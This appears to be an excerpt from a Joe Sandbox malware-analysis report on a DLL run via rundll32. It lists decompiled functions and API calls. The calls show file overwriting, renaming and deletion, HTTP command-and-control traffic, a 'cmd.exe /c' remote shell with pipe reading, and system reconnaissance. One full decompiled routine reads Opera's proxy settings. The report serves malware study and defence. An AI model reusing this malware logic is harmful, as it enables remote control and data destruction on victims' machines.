										} else {
											_t34 =  *0x63c3a8c0; // 0x0
											if(_t34 == 0) {
												goto L7;
											} else {
												_t47 = _t20 -  *0x63c3a8c4; // 0x0
												if(_t47 == 0) {
													continue;
												} else {
													_t33 = 0;
													goto L6;
												}
											}
										}
									} else {
										return 1;
									}
									goto L15;
								}
								goto L13;
							}
						}
					}
					L15:
				}
			}

0x00000000
0x63c07250
0x63c07257
0x00000000
0x63c07259
0x63c07259
0x63c07259
0x63c0725c
0x63c07265
0x00000000
0x63c07267
0x63c07267
0x63c0726c
0x63c0726f
0x63c07275
0x63c0727a
0x63c0727c
0x63c072d5
0x63c072de
0x63c0727e
0x63c07285
0x63c0728c
0x63c07293
0x63c07293
0x63c0729a
0x63c0729f
0x63c072a2
0x63c072a6
0x63c072a8
0x63c072ad
0x63c072b4
0x00000000
0x00000000
0x63c072b6
0x63c072bc
0x63c07223
0x63c0722c
0x63c072cf
0x00000000
0x63c07232
0x63c07232
0x63c0723a
0x00000000
0x63c07240
0x63c07240
0x63c07246
0x00000000
0x63c07248
0x63c07248
0x00000000
0x63c07248
0x63c07246
0x63c0723a
0x63c072c2
0x63c072ce
0x63c072ce
0x00000000
0x63c072bc
0x00000000
0x63c07293
0x63c0727c
0x63c07265
0x00000000
0x63c07257

APIs

LoadLibraryA.KERNEL32 ref: 63C0726F

Part of subcall function 63C07170: strlen.MSVCRT ref: 63C0717A
Part of subcall function 63C07170: strrchr.MSVCRT ref: 63C071BD

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,5ADE2570,?,?,63C075DE), ref: 63C072A6

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002310B0, Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 285

APIs

calloc.MSVCRT ref: 002310F6
calloc.MSVCRT ref: 0023110E
calloc.MSVCRT ref: 00231128
calloc.MSVCRT ref: 00231140
time.MSVCRT ref: 00231150
srand.MSVCRT ref: 00231158
wcscmp.MSVCRT ref: 00231186
CreateFileW.KERNEL32 ref: 0023121F
GetFileSize.KERNEL32 ref: 0023123E
SetFilePointer.KERNEL32 ref: 0023129C
WriteFile.KERNEL32 ref: 002312CE
SetFilePointer.KERNEL32 ref: 00231305
WriteFile.KERNEL32 ref: 0023133B
SetFilePointer.KERNEL32 ref: 0023137B
SetEndOfFile.KERNEL32 ref: 00231387
CloseHandle.KERNEL32 ref: 00231393
_wsplitpath.MSVCRT ref: 002313D6
rand.MSVCRT ref: 002313E5
rand.MSVCRT ref: 00231400
wcscmp.MSVCRT ref: 00231457
MoveFileW.KERNEL32 ref: 002314CC
memset.MSVCRT ref: 002314F2
DeleteFileW.KERNEL32 ref: 002314FE
GetLastError.KERNEL32 ref: 00231510
free.MSVCRT ref: 0023151F
free.MSVCRT ref: 0023152B
free.MSVCRT ref: 00231537
free.MSVCRT ref: 00231543

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 002310C4

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022EE50, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 238

APIs

calloc.MSVCRT ref: 0022EE79
memcpy.MSVCRT ref: 0022EE8F
strstr.MSVCRT ref: 0022EEA3
strchr.MSVCRT ref: 0022EECB
isspace.MSVCRT ref: 0022EEEE
isspace.MSVCRT ref: 0022EF0A
strchr.MSVCRT ref: 0022EF1F
free.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EF45
strstr.MSVCRT ref: 0022EF64
isspace.MSVCRT ref: 0022EF80
isspace.MSVCRT ref: 0022EFA0
strchr.MSVCRT ref: 0022EFBF
_strdup.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EFDB
free.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EFFB
strstr.MSVCRT ref: 0022F02B
strchr.MSVCRT ref: 0022F043
MultiByteToWideChar.KERNEL32 ref: 0022F085
strchr.MSVCRT ref: 0022F09C
atoi.MSVCRT ref: 0022F0AE
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0022E420), ref: 0022F0F0
free.MSVCRT ref: 0022F0FC

Part of subcall function 0022DD90: WinHttpConnect.WINHTTP ref: 0022DDC2
Part of subcall function 0022DD90: WinHttpOpenRequest.WINHTTP ref: 0022DE1F
Part of subcall function 0022DD90: WinHttpSendRequest.WINHTTP ref: 0022DE6A
Part of subcall function 0022DD90: WinHttpWriteData.WINHTTP ref: 0022DEAA
Part of subcall function 0022DD90: GetLastError.KERNEL32 ref: 0022DED0
Part of subcall function 0022DD90: WinHttpSendRequest.WINHTTP ref: 0022DF11

Part of subcall function 0022DF40: WinHttpReceiveResponse.WINHTTP ref: 0022DF6D
Part of subcall function 0022DF40: WinHttpQueryDataAvailable.WINHTTP ref: 0022DF92
Part of subcall function 0022DF40: GetLastError.KERNEL32 ref: 0022DFA5
Part of subcall function 0022DF40: free.MSVCRT ref: 0022DFEA
Part of subcall function 0022DF40: realloc.MSVCRT ref: 0022E007
Part of subcall function 0022DF40: WinHttpReadData.WINHTTP ref: 0022E030

free.MSVCRT ref: 0022F17A

Strings

:, xrefs: 0022F091

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022F680, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 234

APIs

wcslen.MSVCRT ref: 0022F6E9
wcslen.MSVCRT ref: 0022F6F5
calloc.MSVCRT ref: 0022F71F
calloc.MSVCRT ref: 0022F76F
wcscpy.MSVCRT ref: 0022F77D
MultiByteToWideChar.KERNEL32 ref: 0022F7B6
wcscat.MSVCRT ref: 0022F7D8
CloseHandle.KERNEL32 ref: 0022F843
CloseHandle.KERNEL32 ref: 0022F857
free.MSVCRT ref: 0022F863
CloseHandle.KERNEL32 ref: 0022FA9E

Part of subcall function 0022F2D0: WaitForSingleObject.KERNEL32 ref: 0022F2E8
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F2FB
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F315
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F32E
Part of subcall function 0022F2D0: TerminateProcess.KERNEL32 ref: 0022F350

free.MSVCRT ref: 0022F87A
CloseHandle.KERNEL32 ref: 0022FA6E

Part of subcall function 00230D40: GetModuleHandleW.KERNEL32 ref: 00230D97
Part of subcall function 00230D40: GetProcAddress.KERNEL32 ref: 00230DB7
Part of subcall function 00230D40: GetProcAddress.KERNEL32 ref: 00230DCC

CreateProcessW.KERNEL32 ref: 0022F9E0
CloseHandle.KERNEL32 ref: 0022FA0A
CreateThread.KERNEL32 ref: 0022FA5E

Strings

cmd.exe /c ", xrefs: 0022F68A
D, xrefs: 0022F977

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C13A00, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 179

APIs

fwrite.MSVCRT ref: 63C13A2B
vfprintf.MSVCRT ref: 63C13A47
abort.MSVCRT ref: 63C13A4C

Part of subcall function 63C13A60: VirtualQuery.KERNEL32 ref: 63C13B0A
Part of subcall function 63C13A60: memcpy.MSVCRT ref: 63C13B71
Part of subcall function 63C13A60: VirtualProtect.KERNEL32 ref: 63C13BA5
Part of subcall function 63C13A60: memcpy.MSVCRT ref: 63C13BBD
Part of subcall function 63C13A60: VirtualProtect.KERNEL32 ref: 63C13BEB
Part of subcall function 63C13A60: VirtualProtect.KERNEL32 ref: 63C13C35
Part of subcall function 63C13A60: GetLastError.KERNEL32 ref: 63C13C4A

VirtualQuery.KERNEL32 ref: 63C13B43
VirtualQuery.KERNEL32 ref: 63C13E47
VirtualProtect.KERNEL32 ref: 63C13E78

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 63C13C77, 63C13CA3
%-=wOm>w, xrefs: 63C13C35
VirtualProtect failed with code 0x%x, xrefs: 63C13C50
@, xrefs: 63C13C1E
Address %p has no image-section, xrefs: 63C13C8B

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 5ADE2149, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 108

C-Code - Quality: 91%

			E5ADE2149(short* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				short _v532;
				short _v1044;
				WCHAR* _t20;
				void* _t34;
				void* _t35;
				void* _t37;
				void* _t40;
				void* _t43;
				char* _t47;
				intOrPtr* _t49;
				short* _t50;

				_v8 = 0xffffffff;
				_t20 =  &_v532;
				__imp__SHGetSpecialFolderPathW(0, _t20, 0x1a, 0);
				if(_t20 != 0 && GetCurrentDirectoryW(0x100,  &_v1044) != 0 && SetCurrentDirectoryW( &_v532) != 0) {
					if(SetCurrentDirectoryW(L"Opera\\Opera") == 0) {
						L19:
						SetCurrentDirectoryW( &_v1044);
					} else {
						_t34 = CreateFileW(L"operaprefs.ini", 0x80000000, 1, 0, 3, 0x80, 0) + 1;
						if(_t34 == 0) {
							goto L19;
						} else {
							_t35 = _t34 - 1;
							_v20 = _t35;
							_t37 = CreateFileMappingW(_t35, 0, 2, 0, 0, 0);
							if(_t37 == 0) {
								L18:
								CloseHandle(_v20);
								goto L19;
							} else {
								_v16 = _t37;
								_t40 = MapViewOfFile(_v16, 4, 0, 0, 0);
								if(_t40 == 0) {
									L17:
									CloseHandle(_v16);
									goto L18;
								} else {
									_v12 = _t40;
									_t43 = GetFileSize(_v20, 0) + 1;
									if(_t43 == 0) {
										L16:
										UnmapViewOfFile(_v12);
										goto L17;
									} else {
										_t54 = _t43 - 1;
										_t47 = E5ADE22A9(_v12, _t43 - 1, "Use HTTP=");
										if(_t47 == 0) {
											goto L16;
										} else {
											if( *_t47 == 0x30) {
												_v8 = 1;
												goto L16;
											} else {
												if( *_t47 != 0x31) {
													goto L16;
												} else {
													_t49 = E5ADE22A9(_v12, _t54, "HTTP server=");
													if(_t49 == 0) {
														goto L16;
													} else {
														_t50 = _a4;
														do {
															 *_t50 =  *_t49;
															_t50 = _t50 + 2;
															_t49 = _t49 + 1;
														} while ( *_t49 != 0xd);
														 *_t50 = 0;
														_v8 = 2;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 5ADE2167
GetCurrentDirectoryW.KERNEL32(00000100,?), ref: 5ADE2181
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE2196
SetCurrentDirectoryW.KERNEL32(Opera\Opera), ref: 5ADE21A9
CreateFileW.KERNEL32(operaprefs.ini,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5ADE21CE
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 5ADE21EA
MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 5ADE2206
GetFileSize.KERNEL32(?,00000000), ref: 5ADE2218
UnmapViewOfFile.KERNEL32(?), ref: 5ADE227C
CloseHandle.KERNEL32(?), ref: 5ADE2285
CloseHandle.KERNEL32(?), ref: 5ADE228E
SetCurrentDirectoryW.KERNEL32(?), ref: 5ADE229B

Strings

operaprefs.ini, xrefs: 5ADE21C9
Use HTTP=, xrefs: 5ADE2224
Opera\Opera, xrefs: 5ADE21A4
HTTP server=, xrefs: 5ADE2240

Memory Dump Source

Source File: 00000004.00000002.1579340613.5ADE1000.00000040.sdmp, Offset: 5ADE0000, based on PE: true

Associated: 00000004.00000002.1579333111.5ADE0000.00000002.sdmp
Associated: 00000004.00000002.1579348779.5ADE3000.00000004.sdmp
Associated: 00000004.00000002.1579356119.5ADE4000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5ade0000_rundll32.jbxd

Function 0022E080, Relevance: 27.2, APIs: 18, Instructions: 230

APIs

wcslen.MSVCRT ref: 0022E102
calloc.MSVCRT ref: 0022E11F
wcslen.MSVCRT ref: 0022E129
memcpy.MSVCRT ref: 0022E13B
wcslen.MSVCRT ref: 0022E143
MultiByteToWideChar.KERNEL32 ref: 0022E17F

Part of subcall function 0022DD90: WinHttpConnect.WINHTTP ref: 0022DDC2
Part of subcall function 0022DD90: WinHttpOpenRequest.WINHTTP ref: 0022DE1F
Part of subcall function 0022DD90: WinHttpSendRequest.WINHTTP ref: 0022DE6A
Part of subcall function 0022DD90: WinHttpWriteData.WINHTTP ref: 0022DEAA
Part of subcall function 0022DD90: GetLastError.KERNEL32 ref: 0022DED0
Part of subcall function 0022DD90: WinHttpSendRequest.WINHTTP ref: 0022DF11

WinHttpCloseHandle.WINHTTP ref: 0022E1EE
WinHttpCloseHandle.WINHTTP ref: 0022E201
WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E235
WinHttpCloseHandle.WINHTTP ref: 0022E245
free.MSVCRT ref: 0022E25E

Part of subcall function 0022DF40: WinHttpReceiveResponse.WINHTTP ref: 0022DF6D
Part of subcall function 0022DF40: WinHttpQueryDataAvailable.WINHTTP ref: 0022DF92
Part of subcall function 0022DF40: GetLastError.KERNEL32 ref: 0022DFA5
Part of subcall function 0022DF40: free.MSVCRT ref: 0022DFEA
Part of subcall function 0022DF40: realloc.MSVCRT ref: 0022E007
Part of subcall function 0022DF40: WinHttpReadData.WINHTTP ref: 0022E030

GetModuleHandleW.KERNEL32 ref: 0022E2E7
WinHttpOpen.WINHTTP(?,?,?,?,?,?,?,?,?,?,00000000,?,?,0022E564), ref: 0022E321
WinHttpSetOption.WINHTTP ref: 0022E363
WinHttpSetStatusCallback.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0022E391
WinHttpSetTimeouts.WINHTTP ref: 0022E3C6
GetLastError.KERNEL32 ref: 0022E3E0
free.MSVCRT ref: 0022E3FE

Part of subcall function 0022EE50: calloc.MSVCRT ref: 0022EE79
Part of subcall function 0022EE50: memcpy.MSVCRT ref: 0022EE8F
Part of subcall function 0022EE50: strstr.MSVCRT ref: 0022EEA3
Part of subcall function 0022EE50: strchr.MSVCRT ref: 0022EECB
Part of subcall function 0022EE50: isspace.MSVCRT ref: 0022EEEE
Part of subcall function 0022EE50: isspace.MSVCRT ref: 0022EF0A
Part of subcall function 0022EE50: strchr.MSVCRT ref: 0022EF1F
Part of subcall function 0022EE50: free.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EF45
Part of subcall function 0022EE50: strstr.MSVCRT ref: 0022EF64
Part of subcall function 0022EE50: isspace.MSVCRT ref: 0022EF80
Part of subcall function 0022EE50: isspace.MSVCRT ref: 0022EFA0
Part of subcall function 0022EE50: strchr.MSVCRT ref: 0022EFBF
Part of subcall function 0022EE50: _strdup.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EFDB
Part of subcall function 0022EE50: free.MSVCRT(?,?,00000000,?,0022E420), ref: 0022EFFB
Part of subcall function 0022EE50: strstr.MSVCRT ref: 0022F02B
Part of subcall function 0022EE50: strchr.MSVCRT ref: 0022F043
Part of subcall function 0022EE50: MultiByteToWideChar.KERNEL32 ref: 0022F085
Part of subcall function 0022EE50: strchr.MSVCRT ref: 0022F09C
Part of subcall function 0022EE50: atoi.MSVCRT ref: 0022F0AE
Part of subcall function 0022EE50: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0022E420), ref: 0022F0F0
Part of subcall function 0022EE50: free.MSVCRT ref: 0022F0FC
Part of subcall function 0022EE50: free.MSVCRT ref: 0022F17A

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00231EF0, Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 219

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00230879), ref: 00231F0E
calloc.MSVCRT ref: 00231F26
calloc.MSVCRT ref: 00231F3C
memset.MSVCRT ref: 00231F99
memset.MSVCRT ref: 00232003
memset.MSVCRT ref: 0023206D
memset.MSVCRT ref: 002320D7
memset.MSVCRT ref: 00232141
memset.MSVCRT ref: 002321AB
memset.MSVCRT ref: 00232215
memset.MSVCRT ref: 0023227F
calloc.MSVCRT ref: 002322B1
free.MSVCRT ref: 002322CE
free.MSVCRT ref: 002322D6

Strings

@, xrefs: 00231F03

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 002334D0, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 188

APIs

NetWkstaGetInfo.NETAPI32 ref: 002334FF
RegOpenKeyExW.ADVAPI32 ref: 0023353A
RegCloseKey.ADVAPI32 ref: 0023354E
NetApiBufferFree.NETAPI32 ref: 00233568

Part of subcall function 00233410: RegQueryValueExW.ADVAPI32 ref: 0023345C
Part of subcall function 00233410: calloc.MSVCRT ref: 00233479
Part of subcall function 00233410: RegQueryValueExW.ADVAPI32 ref: 002334A3
Part of subcall function 00233410: free.MSVCRT ref: 002334C3

calloc.MSVCRT ref: 002336CA
free.MSVCRT ref: 00233724
free.MSVCRT ref: 0023372C
free.MSVCRT ref: 00233738
free.MSVCRT ref: 00233744
free.MSVCRT ref: 00233750
RegCloseKey.ADVAPI32 ref: 0023375C
calloc.MSVCRT ref: 0023378F
free.MSVCRT ref: 002337A5

Strings

d, xrefs: 002334EE

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00235A50, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 175

APIs

fwrite.MSVCRT ref: 00235A7B
vfprintf.MSVCRT ref: 00235A97
abort.MSVCRT ref: 00235A9C
VirtualQuery.KERNEL32 ref: 00235B93
memcpy.MSVCRT ref: 00235BC1
VirtualProtect.KERNEL32 ref: 00235BF5
memcpy.MSVCRT ref: 00235C0D
VirtualProtect.KERNEL32 ref: 00235C3B

Part of subcall function 00235AB0: VirtualQuery.KERNEL32 ref: 00235B5A
Part of subcall function 00235AB0: VirtualProtect.KERNEL32 ref: 00235C85
Part of subcall function 00235AB0: GetLastError.KERNEL32 ref: 00235C9A

VirtualQuery.KERNEL32 ref: 00235E97
VirtualProtect.KERNEL32 ref: 00235EC8
signal.MSVCRT ref: 0023600A
signal.MSVCRT ref: 0023606F
signal.MSVCRT ref: 002360AF
signal.MSVCRT ref: 002360C8
signal.MSVCRT ref: 002360EE
signal.MSVCRT ref: 0023611F
signal.MSVCRT ref: 0023613F
signal.MSVCRT ref: 0023615F

Strings

@, xrefs: 00235C6E

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 63C08A50, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91

APIs

strcmp.MSVCRT ref: 63C08A6D
GetModuleHandleW.KERNEL32 ref: 63C08A93
GetProcAddress.KERNEL32 ref: 63C08AA3
strcmp.MSVCRT ref: 63C08AD8
VirtualProtect.KERNEL32 ref: 63C08B00
VirtualProtect.KERNEL32 ref: 63C08B36
strcmp.MSVCRT ref: 63C08B63
GetModuleHandleW.KERNEL32 ref: 63C08B93
GetProcAddress.KERNEL32 ref: 63C08BA3

Strings

%-=wOm>w, xrefs: 63C08B00
@, xrefs: 63C08AE9

Memory Dump Source

Source File: 00000004.00000002.1579361651.63C00000.00000040.sdmp, Offset: 63C00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_63c00000_rundll32.jbxd

Function 002322F0, Relevance: 16.7, APIs: 11, Instructions: 152

APIs

calloc.MSVCRT ref: 00232309
calloc.MSVCRT ref: 0023231F
GetLogicalDrives.KERNEL32 ref: 00232328
GetDriveTypeW.KERNEL32 ref: 00232388
GetVolumeInformationW.KERNEL32 ref: 002323E7
GetDiskFreeSpaceExW.KERNEL32 ref: 0023240B
calloc.MSVCRT ref: 00232427
GetLastError.KERNEL32 ref: 00232440
realloc.MSVCRT ref: 002324B2
free.MSVCRT ref: 002324DC
free.MSVCRT ref: 002324F3

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 0022F35C, Relevance: 16.6, APIs: 11, Instructions: 148

APIs

GetTickCount.KERNEL32 ref: 0022F373
GetTickCount.KERNEL32 ref: 0022F379

Part of subcall function 0022F1E0: WaitForSingleObject.KERNEL32 ref: 0022F210
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F238
Part of subcall function 0022F1E0: Sleep.KERNEL32(?,?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F244
Part of subcall function 0022F1E0: calloc.MSVCRT ref: 0022F268
Part of subcall function 0022F1E0: SetEvent.KERNEL32(?,?,?,?,00000000,00000000,773DC380,?,0022F64E,?,?,00239F83), ref: 0022F29B

GetTickCount.KERNEL32 ref: 0022F3FD
GetTickCount.KERNEL32 ref: 0022F40F
Sleep.KERNEL32 ref: 0022F420
PeekNamedPipe.KERNEL32 ref: 0022F469

Part of subcall function 0022F2D0: WaitForSingleObject.KERNEL32 ref: 0022F2E8
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F2FB
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F315
Part of subcall function 0022F2D0: CloseHandle.KERNEL32 ref: 0022F32E
Part of subcall function 0022F2D0: TerminateProcess.KERNEL32 ref: 0022F350

free.MSVCRT ref: 0022F498

Part of subcall function 002215B0: GetTickCount.KERNEL32 ref: 002215B8

realloc.MSVCRT ref: 0022F505
ReadFile.KERNEL32 ref: 0022F532
WaitForSingleObject.KERNEL32 ref: 0022F55E
free.MSVCRT ref: 0022F5C8

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00232C00, Relevance: 16.6, APIs: 11, Instructions: 109

APIs

GetComputerNameW.KERNEL32 ref: 00232C3C
calloc.MSVCRT ref: 00232C50
GetComputerNameW.KERNEL32 ref: 00232C5E
calloc.MSVCRT ref: 00232CC7
calloc.MSVCRT ref: 00232CDD
ConvertSidToStringSidW.ADVAPI32 ref: 00232D1D
calloc.MSVCRT ref: 00232D5F
LocalFree.KERNEL32 ref: 00232D8D
free.MSVCRT ref: 00232D99
free.MSVCRT ref: 00232DA1
free.MSVCRT ref: 00232DA9

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00232A40, Relevance: 16.6, APIs: 11, Instructions: 107

APIs

GetCurrentProcess.KERNEL32 ref: 00232A7C
OpenProcessToken.ADVAPI32 ref: 00232A95
GetTokenInformation.ADVAPI32 ref: 00232AD7
calloc.MSVCRT ref: 00232AEB
GetTokenInformation.ADVAPI32 ref: 00232B11
free.MSVCRT ref: 00232B1D
CloseHandle.KERNEL32 ref: 00232B29
LookupAccountSidW.ADVAPI32 ref: 00232B75
ConvertSidToStringSidW.ADVAPI32 ref: 00232B89
calloc.MSVCRT ref: 00232BC7
LocalFree.KERNEL32 ref: 00232BF1

Memory Dump Source

Source File: 00000004.00000002.1578603429.00221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000004.00000002.1578592458.00220000.00000040.sdmp
Associated: 00000004.00000002.1578618976.0023B000.00000004.sdmp
Associated: 00000004.00000002.1578630667.0023C000.00000002.sdmp
Associated: 00000004.00000002.1578646396.00240000.00000004.sdmp
Associated: 00000004.00000002.1578662020.00243000.00000040.sdmp
Associated: 00000004.00000002.1578677600.00244000.00000004.sdmp
Associated: 00000004.00000002.1578683514.00248000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_220000_rundll32.jbxd

Function 00231D20, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 113

APIs

calloc.MSVCRT ref: 00231D5B
free.MSVCRT ref: 00231D73
GetComputerNameExW.KERNEL32 ref: 00231DAD
calloc.MSVCRT ref: 00231DC5
